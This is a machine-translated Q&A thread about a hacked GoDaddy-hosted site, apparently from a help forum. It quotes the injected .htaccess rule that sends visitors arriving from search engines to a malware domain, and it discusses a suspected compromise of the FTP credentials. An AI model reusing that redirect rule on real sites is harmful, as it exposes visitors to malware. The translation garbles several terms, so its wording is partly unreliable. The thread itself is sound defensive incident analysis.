我的网站被黑了,在这一点上,我知道一些细节,但是我不知道如何发生,以及未来如何预防。 我需要你的帮助,试图解剖攻击,以便我可以防止它再次发生。 这有点长,但我想确保我提供足够的信息来帮助解决问题。
这是发生了什么事。
几个星期前,我从我的托pipe公司GoDaddy收到一封电子邮件,说我的网站使用了太多的资源,他们希望MySQL查询是罪魁祸首。 有问题的查询是一个有5-6个术语的search查询。 我设置的方式越多,search的条件越多,查询就越复杂。 没问题。 我解决了这个问题,但同时,GoDaddy也暂时closures了我的帐户,大概3天之后,一切恢复正常。
事件发生后,我的search引擎stream量急剧下降,大约90%。 它吸了一口气,我没有想到这件事,把它写到查询失败,并认定它会及时返回,因为谷歌recrawled网站。 它没有。
几天前,我收到一封用户的电子邮件,说我的网站托pipe恶意软件。 我直接在浏览器中加载网站,但没有看到任何东西注入页面。 然后我检查我的.htaccess文件,发现以下内容:
<IfModule mod_rewrite.c> RewriteEngine On RewriteOptions inherit RewriteCond %{HTTP_REFERER} .*ask.com.*$ [NC,OR] RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR] RewriteCond %{HTTP_REFERER} .*msn.com*$ [NC,OR] RewriteCond %{HTTP_REFERER} .*bing.com*$ [NC,OR] RewriteCond %{HTTP_REFERER} .*live.com*$ [NC,OR] RewriteCond %{HTTP_REFERER} .*aol.com*$ [NC,OR] RewriteCond %{HTTP_REFERER} .*altavista.com*$ [NC,OR] RewriteCond %{HTTP_REFERER} .*excite.com*$ [NC,OR] RewriteCond %{HTTP_REFERER} .*search.yahoo*$ [NC] RewriteRule .* http://sokoloperkovuskeci.com/in.php?g=584 [R,L] </IfModule> 可爱。 而且有点迂回。 从地址栏或书签直接导航到网站,我通常会这样做,会正常加载网站。 很less有人通过search引擎的链接去我的网站,所以这就是为什么黑客没有被发现,只要这样做。 恶意软件也不是直接托pipe在我的网站上。
快速search显示,其他人也有同样的麻烦,但我怀疑还有更多的人还没有发现。 大多数build议是升级到最新版本的软件,更改密码等。
正如我使用自己的自定义内容pipe理系统,而不是无处不在的WordPress的,我挖了一点深。 我扫描了我所有的文件,用于PHP漏洞利用的常用函数:base64_decode,exec,shell等…没有可疑的东西出现,没有额外的文件存在。
接下来,我检查了GoDaddy的文件pipe理器历史logging,发现.htaccess文件在与我的search查询被指责使用过多的服务器资源时完全相同的date发生了变化。 这可能是一个不幸的巧合,但我不完全确定。 在.htaccess文件中的redirect似乎不是资源密集型的,而且查询足够复杂,可能会占用资源。
我想确定我的代码不是问题所在,所以在修改.htaccess文件的时候,我检查了stream量日志的可疑活动,但没有看到任何看起来exception的GET或POST活动,黑客的尝试。
最后,我向GoDaddy请求了FTP日志,发现在.htaccess文件被更改时存在未经授权的FTP访问。 当时我正在度假,电脑关机,没有其他人拥有访问凭证。 它看起来像谁在使用FTP的主要FTP用户帐户,但IP为91.220.0.19,看起来像是从拉脱维亚 。
在共享主机上,GoDaddy会根据网站的URL自动分配一个主要的FTP用户名。 这是非常可预测的,或者至less,当我设立我的托pipe帐户。 我几年前第一次注册了主机帐户,所以它可能已经改变了,但是从我记忆中,我无法select主要的FTP用户名。 目前,您也无法更改用户名,这听起来像GoDaddy无法,除非您取消您的帐户,并辞职。 虽然可以创build,删除和编辑其他FTP用户,但是主FTP用户不能被删除。 只有密码可以更改。
除了主要的FTP用户名之外,站点,数据库,pipe理员和帐户的所有访问凭证都是乱码,随机的用户名和密码,看起来像你的猫在你的键盘上行走。 例如:lkSADf32!$ asJd3。
我已经彻底扫描了我的电脑中的病毒,恶意软件等,以防万一它是链接中的弱点,但没有任何结果。 我使用防火墙,防病毒程序,并尝试使用安全的浏览习惯。
当我更新我的网站时,我使用Core FTP LE和一个SSH / SFTP连接。 主机帐户是一个Linux设置。
在与GoDaddy技术支持人员交谈时,他们不确定FTP密码是如何泄露的。 在共享主机上,他们无法在FTP用户级别放置IP块。 他们也无法更改主要的FTP用户名。 当我问他们是否对FTP访问有powershell保护时,技术人员首先听起来不确定,但之后他们说了几次之后我们就这样做了。 不过,我想我记得在之前的电话和听力中提到的同一个问题,就是GoDaddy没有对FTP访问进行powershell保护。 在这一点上,我不知道他们是否做。
我已经改变了所有的访问凭据,并禁止使用.htaccess文件的拉脱维亚IP地址(如果他们使用的FTP可能没有什么区别),但是我仍然不确定FTP密码被入侵。
我相当肯定,问题不在于我的代码(即使它是,FTP信息不应该被暴露),或与我的电脑。 我怀疑,但不知道如何certificate,FTP密码是蛮力的,因为用户名是可以预测的。 蛮力攻击也可能与服务器资源耗尽(归咎于我的查询)一致,但我不知道服务器的技术方面是否足够了解这是否可能,甚至可能。
现在我觉得我已经知道该做什么了。 我希望能够理解攻击是如何进行的,以及如何防止这种攻击,所以如果您对攻击媒介有任何进一步的想法,可以运行的诊断或额外的安全措施,我将非常感激。 我更愿意改变主机或沟通共享主机,但我想确保我可以防止这种情况再次发生。
帮助我,欧比旺Kenobi …
在阅读你的文章时,有些事情变得很熟悉。 然后它打到我:一个多月前,当我试图访问一个游戏的网站时,我曾经见过这个。 看到这里 – 相同的行为,只是在search引擎推荐人采取的redirect行动。
.htaccess的域名看起来很熟悉,因为我的家用电脑的防病毒软件在几个星期前就已经发出了巨大的噪音。
而且,你不知道吗,我曾经观察过这个网站的主持人? 去吧爸爸。
我不认为你被暴力破解,或者你的密码由于你自己的错误而被破坏; 我认为GoDaddy是在这里妥协的人。 而且我不会把它放在他们的存储FTP密码的纯文本。 一些挖掘发现这篇文章暗示相同; 暴力保护可能是他们的问题中最less的。
简单! 不要使用FTP。 它以纯文本传输凭证,并以纯文本传输所有数据。 这是传输文件最不安全的方法之一。 如果您的主机不支持任何其他方式,请find一个新的主机。